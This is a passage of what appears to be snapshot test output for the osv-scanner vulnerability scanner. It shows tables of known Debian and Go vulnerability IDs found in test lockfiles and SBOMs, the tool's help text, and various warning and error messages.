https://osv.dev/DSA-4539-3 | | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4661-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4807-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4855-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4875-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4963-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5103-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5139-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5169-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5343-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5417-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5532-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5764-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6015-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6113-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0732 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0734 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0735 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-5407 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1543 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1549 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3450 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2274 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3358 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3602 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3786 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3996 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-4203 | 4.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0216 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0217 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0401 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-1255 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-2975 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3446 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3817 | | | | | | | | https://osv.dev/DLA-3530-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-5678 | 9.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0727 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-2511 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4741 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-5535 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-9143 | | | | | | | | https://osv.dev/DLA-3942-1 | | | | | | | | https://osv.dev/DLA-3942-2 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-6129 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-6237 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-12797 | 6.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-13176 | 4.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4176-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4603 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-11187 | 6.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15468 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15469 | 5.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-4575 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-66199 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9231 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2673 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5902-1 | 8.4 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12837 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12883 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-12015 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18311 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18312 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18313 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18314 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6797 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6798 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6913 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10543 | 8.2 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10878 | 8.6 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-12723 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-16156 | 8.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-31484 | | | | | | | | https://osv.dev/DLA-3926-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2021-36770 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-47038 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-40909 | 5.9 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5135-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3072-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3189-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3316-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3422-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3600-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3651-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3764-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-17512 | 8.8 | Debian | sensible-utils | 0.0.9+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-20482 | 4.7 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-39804 | 6.2 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3755-1 | | | | | | | | https://osv.dev/DLA-3051-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3134-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3161-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3366-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3412-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3684-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3788-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3972-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4085-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4105-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4403-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4016-1 | | Debian | ucf | 3.0036 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5055-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5650-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2779 | 7.8 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-3184 | | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5123-1 | 8.8 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5895-1 | 8.7 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-3094 | 10.0 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+---------------------------------------------------------------------+ --- [TestCommand/folder_of_supported_sbom_with_vulns - 2] --- [TestCommand/gh-annotations_with_vulns - 1] --- [TestCommand/gh-annotations_with_vulns - 2] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. ::error file=testdata/locks-many-with-insecure/package-lock.json::testdata/locks-many-with-insecure/package-lock.json%0A+-----------+-------------------------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+-----------+-------------------------------------+------+-----------------+---------------+%0A| ansi-html | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | 0.0.1 | 0.0.8 |%0A+-----------+-------------------------------------+------+-----------------+---------------+ --- [TestCommand/go_packages_in_osv-scanner.json_format - 1] Scanned /testdata/locks-insecure/osv-scanner.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 2 packages affected by 24 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 24 Unknown) from 1 ecosystem. 24 vulnerabilities can be fixed. +------------------------------+------+-----------+-----------+---------+---------------+------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +------------------------------+------+-----------+-----------+---------+---------------+------------------------------------------+ | https://osv.dev/GO-2025-3849 | | Go | stdlib | 1.24.4 | 1.24.6 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-3956 | | Go | stdlib | 1.24.4 | 1.24.6 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4006 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4007 | | Go | stdlib | 1.24.4 | 1.24.9 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4008 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4009 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4010 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4011 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4012 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4013 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4014 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4015 | | Go | stdlib | 1.24.4 | 1.24.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4155 | | Go | stdlib | 1.24.4 | 1.24.11 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-4175 | | Go | stdlib | 1.24.4 | 1.24.11 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4337 | | Go | stdlib | 1.24.4 | 1.24.13 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4340 | | Go | stdlib | 1.24.4 | 1.24.12 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4341 | | Go | stdlib | 1.24.4 | 1.24.12 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4342 | | Go | stdlib | 1.24.4 | 1.24.12 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4601 | | Go | stdlib | 1.24.4 | 1.25.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4602 | | Go | stdlib | 1.24.4 | 1.25.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4603 | | Go | stdlib | 1.24.4 | 1.25.8 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2025-3828 | | Go | toolchain | 1.24.4 | 1.24.5 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4339 | | Go | toolchain | 1.24.4 | 1.24.12 | testdata/locks-insecure/osv-scanner.json | | https://osv.dev/GO-2026-4433 | | Go | toolchain | 1.24.4 | 1.24.13 | testdata/locks-insecure/osv-scanner.json | +------------------------------+------+-----------+-----------+---------+---------------+------------------------------------------+ --- [TestCommand/go_packages_in_osv-scanner.json_format - 2] --- [TestCommand/help - 1] NAME: osv-scanner source - scans a source project's dependencies for known vulnerabilities using the OSV database. USAGE: osv-scanner source [options] [directory1 directory2...] DESCRIPTION: scans a source project's dependencies for known vulnerabilities using the OSV database. OPTIONS: --lockfile string, -L string [ --lockfile string, -L string ] scan package lockfile on this path --sbom string, -S string [ --sbom string, -S string ] [DEPRECATED] scan sbom file on this path, the sbom file name must follow the relevant spec --recursive, -r check subdirectories --no-ignore also scan files that would be ignored by .gitignore --include-git-root include scanning git root (non-submoduled) repositories --experimental-exclude string [ --experimental-exclude string ] exclude directory paths during scanning; use g:pattern for glob, r:pattern for regex, or just dirname for exact match (can be repeated) --data-source string source to fetch package information from; value can be: deps.dev, native (default: "deps.dev") --maven-registry string URL of the default registry to fetch Maven metadata --config string set/override config file --format string, -f string sets the output format; value can be: table, html, vertical, json, markdown, sarif, gh-annotations, cyclonedx-1-4, cyclonedx-1-5, spdx-2-3 (default: "table") --serve output as HTML result and serve it locally --port string port number to use when serving HTML report (default: 8000) --output string [DEPRECATED] (Use "--output-file" instead) saves the result to the given file path --output-file string saves the result to the given file path --verbosity string specify the level of information that should be provided during runtime; value can be: error, warn, info (default: "info") --offline run in offline mode, disabling any features requiring network access --offline-vulnerabilities checks for vulnerabilities using local databases that are already cached --download-offline-databases downloads vulnerability databases for offline comparison --call-analysis string [ --call-analysis string ] Enable call analysis for specific languages (e.g. --call-analysis=go). Supported: go, rust (*). (*) Will run build scripts. --no-call-analysis string [ --no-call-analysis string ] disables call graph analysis --no-resolve disable transitive dependency resolution of manifest files --allow-no-lockfiles has the scanner consider no lockfiles being found as ok --all-packages when json output is selected, prints all packages --all-vulns show all vulnerabilities including unimportant and uncalled ones --licenses value report on licenses based on an allowlist --experimental-flag-deprecated-packages report if package versions are deprecated --experimental-plugins string [ --experimental-plugins string ] list of specific plugins and presets of plugins to use (default: "lockfile", "sbom", "directory") --experimental-disable-plugins string [ --experimental-disable-plugins string ] list of specific plugins and presets of plugins to not use --experimental-no-default-plugins disable default plugins, instead using only those enabled by --experimental-plugins --help, -h show help --- [TestCommand/help - 2] --- [TestCommand/ignores_without_reason_should_be_explicitly_called_out - 1] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Package Packagist/sentry/sdk/2.0.4 has been filtered out because: (no reason given) Filtered 1 ignored package/s from the scan. GHSA-whgm-jr23-g3j9 and 1 alias have been filtered out because: (no reason given) Filtered 1 vulnerability from output No issues found --- [TestCommand/ignores_without_reason_should_be_explicitly_called_out - 2] --- [TestCommand/ignoring_.gitignore - 1] Scanning dir ./testdata/locks-gitignore Scanned /testdata/locks-gitignore/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/composer.lock file and found 1 package Scanned /testdata/locks-gitignore/ignored/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/ignored/yarn.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/composer.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/yarn.lock file and found 1 package Scanned /testdata/locks-gitignore/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/ignoring_.gitignore - 2] --- [TestCommand/invalid_--verbosity_value - 1] --- [TestCommand/invalid_--verbosity_value - 2] invalid verbosity level "unknown" - must be one of: error, warn, info --- [TestCommand/json_output - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand/json_output - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml --- [TestCommand/nested_directories_are_checked_when_`--recursive`_is_passed - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/nested_directories_are_checked_when_`--recursive`_is_passed - 2] --- [TestCommand/no_lockfiles_with_allow_flag_but_another_error_happens_is_not_fine - 1] Scanning dir ./testdata/locks-none-does-not-exist --- [TestCommand/no_lockfiles_with_allow_flag_but_another_error_happens_is_not_fine - 2] failed to resolve path: stat /testdata/locks-none-does-not-exist: no such file or directory --- [TestCommand/no_lockfiles_with_recursion_and_with_allow_flag_are_fine - 1] Scanning dir ./testdata/locks-none Scanned /testdata/locks-none/nested/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/no_lockfiles_with_recursion_and_with_allow_flag_are_fine - 2] --- [TestCommand/no_lockfiles_with_recursion_but_without_allow_flag_are_fine - 1] Scanning dir ./testdata/locks-none Scanned /testdata/locks-none/nested/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/no_lockfiles_with_recursion_but_without_allow_flag_are_fine - 2] --- [TestCommand/no_lockfiles_without_recursion_but_with_allow_flag_are_fine - 1] Scanning dir ./testdata/locks-none Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No package sources found No issues found --- [TestCommand/no_lockfiles_without_recursion_but_with_allow_flag_are_fine - 2] --- [TestCommand/no_lockfiles_without_recursion_or_allow_flag_give_an_error - 1] Scanning dir ./testdata/locks-none Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand/no_lockfiles_without_recursion_or_allow_flag_give_an_error - 2] No package sources found, --help for usage information. --- [TestCommand/one_file_that_does_not_match_the_supported_sbom_file_names - 1] Warning: --sbom has been deprecated in favor of -L --- [TestCommand/one_file_that_does_not_match_the_supported_sbom_file_names - 2] Failed to parse SBOM "./testdata/locks-many/composer.lock": Invalid SBOM filename. If you believe this is a valid SBOM, make sure the filename follows format per your SBOMs specification. invalid SBOM filename: ./testdata/locks-many/composer.lock --- [TestCommand/one_file_that_does_not_match_the_supported_sbom_file_names_using_-L_flag - 1] --- [TestCommand/one_file_that_does_not_match_the_supported_sbom_file_names_using_-L_flag - 2] could not determine extractor, requested spdx --- [TestCommand/one_specific_supported_lockfile - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand/one_specific_supported_lockfile - 2] --- [TestCommand/one_specific_supported_lockfile_with_ignore - 1] Scanning dir ./testdata/locks-test-ignore/package-lock.json Scanned /testdata/locks-test-ignore/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-test-ignore/osv-scanner-test.toml CVE-2021-23424 and 1 alias have been filtered out because: Test manifest file (package-lock.json) Filtered 1 vulnerability from output No issues found --- [TestCommand/one_specific_supported_lockfile_with_ignore - 2] --- [TestCommand/one_specific_supported_lockfile_with_offline_explicitly_false - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand/one_specific_supported_lockfile_with_offline_explicitly_false - 2] --- [TestCommand/one_specific_supported_sbom_with_duplicate_PURLs - 1] Warning: --sbom has been deprecated in favor of -L Scanned /testdata/sbom-insecure/with-duplicates.cdx.xml file and found 17 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. Total 2 packages affected by 5 known vulnerabilities (1 Critical, 3 High, 1 Medium, 0 Low, 0 Unknown) from 1 